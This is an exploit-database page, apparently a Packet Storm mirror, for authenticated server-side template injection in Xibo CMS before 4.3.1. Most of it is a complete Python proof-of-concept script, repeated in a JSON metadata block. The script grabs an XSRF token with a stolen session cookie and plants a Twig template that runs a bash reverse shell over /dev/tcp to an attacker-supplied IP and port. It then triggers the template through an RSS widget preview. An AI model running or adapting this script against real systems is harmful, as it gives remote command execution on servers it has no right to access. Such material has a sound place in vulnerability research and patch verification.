📄 Xibo CMS SSTI / Remote Code Execution_PACKETSTORM:220365

7.2 / 10

HIGH

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Description

Xibo CMS versions prior to 4.3.1 suffer from an authenticated remote code execution vulnerability via server-side template injection...

Visit Original Source

Basic Information

ID PACKETSTORM:220365

Published May 5, 2026 at 00:00

Affected Product

Affected Versions # Exploit Title: Xibo CMS - Authenticated Remote Code Execution via SSTI
# Date: 2025-11-04
# Exploit Author: Cristian Branet
# Vendor Homepage: https://xibosignage.com/
# Software Link: https://github.com/xibosignage/xibo-cms/
# Version: < 4.3.1
# Tested on: Linux (Ubuntu 22.04)
# CVE : CVE-2025-62639
# Article: https://cristibtz.github.io/posts/CVE-2025-62369/

import requests, argparse, pyfiglet, re, json, time

parser = argparse.ArgumentParser(description="This script exploits CVE-2025-62369 in Xibo CMS to get a reverse shell.", formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument("-u", "--url", required=True, help="Xibo CMS server URL (e.g., http://localhost)")
parser.add_argument("-s", "--session-key", required=True, help="Use the PHPSESSID")
parser.add_argument("-i", "--ip", required=True, help="IP address for reverse shell")
parser.add_argument("-p", "--port", required=True, help="Port for reverse shell")

class Exploit:

def __init__(self, url, session, ip, port):
self.url = url
self.session = session
self.ip = ip
self.port = port
self.headers = {
"Cookie": f"PHPSESSID={session}",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36"
}

def get_xsrf_token(self):

try:
response = requests.get(f"{url}/statusdashboard", headers=self.headers)
except Exception as e:
print(f"Error connecting to {url}: {e}")
exit(1)

text = response.text

pattern = r'name="token" content="([a-f0-9]+)"'

try:
xsrf_token = re.search(pattern, text).group(1)
except Exception as e:
print(f"Error extracting XSRF token: {e}")
exit(1)

return xsrf_token

def create_module_template(self, xsrf_token):

timestamp = int(time.time())

headers = {
"Cookie": f"PHPSESSID={session}",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36",
"X-XSRF-TOKEN": f"{xsrf_token}",
"X-Requested-With": "XMLHttpRequest"
}

data = {
"templateId": f"exploit_poc_{timestamp}",
"title": "Template for PoC",
"dataType": "article",
"copyTemplateId": "",
"showIn": "layout"
}

try:
response = requests.post(f"{self.url}/developer/template", data=data, headers=headers)
except Exception as e:
print(f"Error creating module template: {e}")
exit(1)

response_info = json.loads(response.text)

template_id = response_info["id"]

return template_id, timestamp, f"exploit_poc_{timestamp}"

def update_module_template(self, xsrf_token, template_id, name):

headers = {
"Cookie": f"PHPSESSID={session}",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36",
"X-XSRF-TOKEN": f"{xsrf_token}",
"X-Requested-With": "XMLHttpRequest"
}

data = {
"templateId":f"{name}",
"title": f"Template for PoC - {name}",
"dataType": "article",
"showIn": "layout",
"enabled": "on",
"developer-template-properties": [],
"properties": [],
"twig": '<div style="background: red; color: white; font-size: 24px; padding: 20px;">Command Execution: {{["' + f"bash -c 'bash -i >& /dev/tcp/{ip}/{port} 0>&1'" + '"]|filter(\'system\')}} <br></div>',
"hbs": "",
"style": "",
"head": "",
"onTemplateRender": "",
"onTemplateVisible": "",
"isInvalidateWidget": "on"
}

try:
response = requests.put(f"{self.url}/developer/template/{template_id}", data=data, headers=headers)
except Exception as e:
print(f"Error updating module template: {e}")
exit(1)

response_info = json.loads(response.text)

return response_info["success"]

def create_normal_template(self, xsrf_token):

timestamp = int(time.time())

headers = {
"Cookie": f"PHPSESSID={session}",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36",
"X-XSRF-TOKEN": f"{xsrf_token}",
"X-Requested-With": "XMLHttpRequest"
}

data = {
"folderId": 1,
"name": f"exploit_poc_template_{timestamp}",
"tags": "",
"tagValueInput": "",
"resolutionId": 1,
"description": "Exploit template"
}

try:
response = requests.post(f"{self.url}/template", data=data, headers=headers)
except Exception as e:
print(f"Error creating normal template: {e}")
exit(1)

response_info = json.loads(response.text)

template_id = response_info["id"]
layout_id = response_info["data"]["layoutId"]
region_id = response_info["data"]["regions"][0]["regionId"]
playlist_id = response_info["data"]["regions"][0]["regionPlaylist"]["playlistId"]

return template_id, layout_id, region_id, playlist_id

def add_rss_widget(self, xsrf_token, playlist_id, name):

headers = {
"Cookie": f"PHPSESSID={session}",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36",
"X-XSRF-TOKEN": f"{xsrf_token}",
"X-Requested-With": "XMLHttpRequest"
}

data = {
"templateId": f"{name}",
}

try:
response = requests.post(f"{url}/playlist/widget/rss-ticker/{str(int(playlist_id) + 1)}", data=data, headers=headers)
except Exception as e:
print(f"Error adding RSS widget: {e}")
exit(1)

response_info = json.loads(response.text)

widget_id = response_info["id"]

return widget_id

def preview_rss_widget(self, xsrf_token, widget_id, playlist_id):

headers = {
"Cookie": f"PHPSESSID={session}",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36",
"X-XSRF-TOKEN": f"{xsrf_token}",
"X-Requested-With": "XMLHttpRequest"
}

try:
response = requests.get(f"{url}/playlist/widget/resource/{str(int(playlist_id) + 1)}/{widget_id}?preview=1&isEditor=1", headers=headers)
except Exception as e:
print(f"Error previewing RSS widget: {e}")
exit(1)

return response.status_code

if __name__=="__main__":
print("\n")
print(pyfiglet.figlet_format("CVE-2025-62369 PoC", font="small", width=100))
print("Author: Cristian Branet")
print("GitHub: github.com/cristibtz")
print("Description: This script exploits CVE-2025-62369 in Xibo CMS to get a reverse shell.")
print("\n")

args = parser.parse_args()
url = args.url
session = args.session_key
ip = args.ip
port = args.port

xibo_exploit = Exploit(url, session, ip, port)

try:
xsrf_token = xibo_exploit.get_xsrf_token()
except Exception as e:
print(f"Error getting XSRF token: {e}")
exit(1)

print("Retrieved XSRF token: ")
print(xsrf_token)

try:
module_template_id, creation_time, name = xibo_exploit.create_module_template(xsrf_token)
except Exception as e:
print(f"Error creating module template: {e}")
exit(1)

print(f"Created module template with id: {module_template_id} with name: {name}")

try:
update_success = xibo_exploit.update_module_template(xsrf_token, module_template_id, name)
except Exception as e:
print(f"Error updating module template: {e}")
exit(1)

print(f"Updated module template with success: {update_success}")

print("Creating normal template...")

try:
normal_template_id, layout_id, region_id, playlist_id = xibo_exploit.create_normal_template(xsrf_token)
except Exception as e:
print(f"Error creating normal template: {e}")
exit(1)

print("Created normal template with: ")

print(f"Normal Template ID: {normal_template_id}")
print(f"Layout ID: {layout_id}")
print(f"Region ID: {region_id}")
print(f"Playlist ID: {playlist_id}")

print("Adding RSS widget to playlist...")

try:
widget_id = xibo_exploit.add_rss_widget(xsrf_token, playlist_id, name)
except Exception as e:
print(f"Error adding RSS widget: {e}")
exit(1)

print(f"Added RSS widget with ID: {widget_id}")

print("Previewing RSS widget to trigger the exploit...")

try:
status_code = xibo_exploit.preview_rss_widget(xsrf_token, widget_id, playlist_id)
except Exception as e:
print(f"Error previewing RSS widget: {e}")
exit(1)

if status_code == 200:
print("Exploit triggered successfully! Check your listener for a reverse shell.")
else:
print("Failed to trigger the exploit.")

{
    "lastseen": "2026-05-05T21:32:39",
    "description": "Xibo CMS versions prior to 4.3.1 suffer from an authenticated remote code execution vulnerability via server-side template injection...",
    "published": "2026-05-05T00:00:00",
    "modified": "2026-05-05T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Xibo CMS SSTI / Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:220365",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-62369",
        "CVE-2025-62639"
    ],
    "sourceData": "# Exploit Title: Xibo CMS - Authenticated Remote Code Execution via SSTI\n    # Date: 2025-11-04\n    # Exploit Author: Cristian Branet\n    # Vendor Homepage: https://xibosignage.com/\n    # Software Link: https://github.com/xibosignage/xibo-cms/\n    # Version: < 4.3.1\n    # Tested on: Linux (Ubuntu 22.04)\n    # CVE : CVE-2025-62639\n    # Article: https://cristibtz.github.io/posts/CVE-2025-62369/\n    \n    import requests, argparse, pyfiglet, re, json, time\n    \n    parser = argparse.ArgumentParser(description=\"This script exploits CVE-2025-62369 in Xibo CMS to get a reverse shell.\", formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n    parser.add_argument(\"-u\", \"--url\", required=True, help=\"Xibo CMS server URL (e.g., http://localhost)\")\n    parser.add_argument(\"-s\", \"--session-key\", required=True, help=\"Use the PHPSESSID\")\n    parser.add_argument(\"-i\", \"--ip\", required=True, help=\"IP address for reverse shell\")\n    parser.add_argument(\"-p\", \"--port\", required=True, help=\"Port for reverse shell\")\n    \n    class Exploit:\n        \n        def __init__(self, url, session, ip, port):\n            self.url = url\n            self.session = session\n            self.ip = ip\n            self.port = port\n            self.headers = {\n                \"Cookie\": f\"PHPSESSID={session}\",\n                \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36\"\n            }\n    \n        def get_xsrf_token(self):\n    \n            try:            \n                response = requests.get(f\"{url}/statusdashboard\", headers=self.headers)\n            except Exception as e:\n                print(f\"Error connecting to {url}: {e}\")\n                exit(1)\n    \n            text = response.text\n    \n            pattern = r'name=\"token\" content=\"([a-f0-9]+)\"'\n            \n            try:\n                xsrf_token = re.search(pattern, text).group(1)\n            except Exception as e:\n                print(f\"Error extracting XSRF token: {e}\")\n                exit(1)\n    \n            return xsrf_token\n    \n        def create_module_template(self, xsrf_token):\n    \n            timestamp = int(time.time())\n    \n            headers = {\n                \"Cookie\": f\"PHPSESSID={session}\",\n                \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36\",\n                \"X-XSRF-TOKEN\": f\"{xsrf_token}\",\n                \"X-Requested-With\": \"XMLHttpRequest\"\n            }\n    \n            data = {\n                \"templateId\": f\"exploit_poc_{timestamp}\", \n                \"title\": \"Template for PoC\",\n                \"dataType\": \"article\",\n                \"copyTemplateId\": \"\",\n                \"showIn\": \"layout\"\n            }    \n    \n            try:\n                response = requests.post(f\"{self.url}/developer/template\", data=data, headers=headers)\n            except Exception as e:\n                print(f\"Error creating module template: {e}\")\n                exit(1)\n    \n            response_info = json.loads(response.text)\n    \n            template_id = response_info[\"id\"]\n    \n            return template_id, timestamp, f\"exploit_poc_{timestamp}\"\n    \n    \n        def update_module_template(self, xsrf_token, template_id, name):\n    \n            headers = {\n                \"Cookie\": f\"PHPSESSID={session}\",\n                \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36\",\n                \"X-XSRF-TOKEN\": f\"{xsrf_token}\",\n                \"X-Requested-With\": \"XMLHttpRequest\"\n            }\n    \n            data = {\n                \"templateId\":f\"{name}\",\n                \"title\": f\"Template for PoC - {name}\",\n                \"dataType\": \"article\",\n                \"showIn\": \"layout\",\n                \"enabled\": \"on\",\n                \"developer-template-properties\": [],\n                \"properties\": [],\n                \"twig\": '<div style=\"background: red; color: white; font-size: 24px; padding: 20px;\">Command Execution: {{[\"' + f\"bash -c 'bash -i >& /dev/tcp/{ip}/{port} 0>&1'\" + '\"]|filter(\\'system\\')}} <br></div>',\n                \"hbs\": \"\",\n                \"style\": \"\",\n                \"head\": \"\",\n                \"onTemplateRender\": \"\",\n                \"onTemplateVisible\": \"\",\n                \"isInvalidateWidget\": \"on\"\n            }    \n    \n            try:\n                response = requests.put(f\"{self.url}/developer/template/{template_id}\", data=data, headers=headers)\n            except Exception as e:\n                print(f\"Error updating module template: {e}\")\n                exit(1)\n    \n            response_info = json.loads(response.text)\n    \n            return response_info[\"success\"]\n    \n        def create_normal_template(self, xsrf_token):\n    \n            timestamp = int(time.time())\n    \n            headers = {\n                \"Cookie\": f\"PHPSESSID={session}\",\n                \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36\",\n                \"X-XSRF-TOKEN\": f\"{xsrf_token}\",\n                \"X-Requested-With\": \"XMLHttpRequest\"\n            }\n    \n            data = {\n                \"folderId\": 1,\n                \"name\": f\"exploit_poc_template_{timestamp}\",\n                \"tags\": \"\",\n                \"tagValueInput\": \"\",\n                \"resolutionId\": 1,\n                \"description\": \"Exploit template\"\n            }    \n    \n            try:\n                response = requests.post(f\"{self.url}/template\", data=data, headers=headers)\n            except Exception as e:\n                print(f\"Error creating normal template: {e}\")\n                exit(1)\n    \n            response_info = json.loads(response.text)\n    \n            template_id = response_info[\"id\"]\n            layout_id = response_info[\"data\"][\"layoutId\"]\n            region_id = response_info[\"data\"][\"regions\"][0][\"regionId\"]\n            playlist_id = response_info[\"data\"][\"regions\"][0][\"regionPlaylist\"][\"playlistId\"]\n    \n            return template_id, layout_id, region_id, playlist_id\n    \n        def add_rss_widget(self, xsrf_token, playlist_id, name):\n            \n            headers = {\n                \"Cookie\": f\"PHPSESSID={session}\",\n                \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36\",\n                \"X-XSRF-TOKEN\": f\"{xsrf_token}\",\n                \"X-Requested-With\": \"XMLHttpRequest\"\n            }\n    \n            data = {\n                \"templateId\": f\"{name}\",\n            }\n    \n            try:\n                response = requests.post(f\"{url}/playlist/widget/rss-ticker/{str(int(playlist_id) + 1)}\", data=data, headers=headers)\n            except Exception as e:\n                print(f\"Error adding RSS widget: {e}\")\n                exit(1)\n        \n            response_info = json.loads(response.text)\n    \n            widget_id = response_info[\"id\"]\n    \n            return widget_id\n    \n        def preview_rss_widget(self, xsrf_token, widget_id, playlist_id):\n            \n            headers = {\n                \"Cookie\": f\"PHPSESSID={session}\",\n                \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36\",\n                \"X-XSRF-TOKEN\": f\"{xsrf_token}\",\n                \"X-Requested-With\": \"XMLHttpRequest\"\n            }\n    \n            try:\n                response = requests.get(f\"{url}/playlist/widget/resource/{str(int(playlist_id) + 1)}/{widget_id}?preview=1&isEditor=1\", headers=headers)\n            except Exception as e:\n                print(f\"Error previewing RSS widget: {e}\")\n                exit(1)\n    \n            return response.status_code\n    \n    if __name__==\"__main__\":\n        print(\"\\n\")\n        print(pyfiglet.figlet_format(\"CVE-2025-62369 PoC\", font=\"small\", width=100))\n        print(\"Author: Cristian Branet\")\n        print(\"GitHub: github.com/cristibtz\")\n        print(\"Description: This script exploits CVE-2025-62369 in Xibo CMS to get a reverse shell.\")\n        print(\"\\n\")\n    \n        args = parser.parse_args()\n        url = args.url\n        session = args.session_key\n        ip = args.ip\n        port = args.port\n    \n        xibo_exploit = Exploit(url, session, ip, port)\n    \n        try:\n            xsrf_token = xibo_exploit.get_xsrf_token()\n        except Exception as e:\n            print(f\"Error getting XSRF token: {e}\")\n            exit(1)\n        \n        print(\"Retrieved XSRF token: \")\n        print(xsrf_token)\n    \n        try:\n            module_template_id, creation_time, name = xibo_exploit.create_module_template(xsrf_token)\n        except Exception as e:\n            print(f\"Error creating module template: {e}\")\n            exit(1)\n    \n        print(f\"Created module template with id: {module_template_id} with name: {name}\")\n    \n        try:\n            update_success = xibo_exploit.update_module_template(xsrf_token, module_template_id, name)\n        except Exception as e:\n            print(f\"Error updating module template: {e}\")\n            exit(1)\n    \n        print(f\"Updated module template with success: {update_success}\")\n    \n        print(\"Creating normal template...\")\n    \n        try:\n            normal_template_id, layout_id, region_id, playlist_id = xibo_exploit.create_normal_template(xsrf_token)\n        except Exception as e:\n            print(f\"Error creating normal template: {e}\")\n            exit(1)\n        \n        print(\"Created normal template with: \")\n    \n        print(f\"Normal Template ID: {normal_template_id}\")\n        print(f\"Layout ID: {layout_id}\")\n        print(f\"Region ID: {region_id}\")\n        print(f\"Playlist ID: {playlist_id}\")\n    \n        print(\"Adding RSS widget to playlist...\")\n    \n        try:\n            widget_id = xibo_exploit.add_rss_widget(xsrf_token, playlist_id, name)\n        except Exception as e:\n            print(f\"Error adding RSS widget: {e}\")\n            exit(1)\n    \n        print(f\"Added RSS widget with ID: {widget_id}\")\n    \n        print(\"Previewing RSS widget to trigger the exploit...\")\n    \n        try:\n            status_code = xibo_exploit.preview_rss_widget(xsrf_token, widget_id, playlist_id)\n        except Exception as e:\n            print(f\"Error previewing RSS widget: {e}\")\n            exit(1)\n    \n        if status_code == 200:\n            print(\"Exploit triggered successfully! Check your listener for a reverse shell.\")\n        else:\n            print(\"Failed to trigger the exploit.\")",
    "sourceHref": "https://packetstorm.news/download/220365",
    "cvss": {
        "score": 7.2,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/220365/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply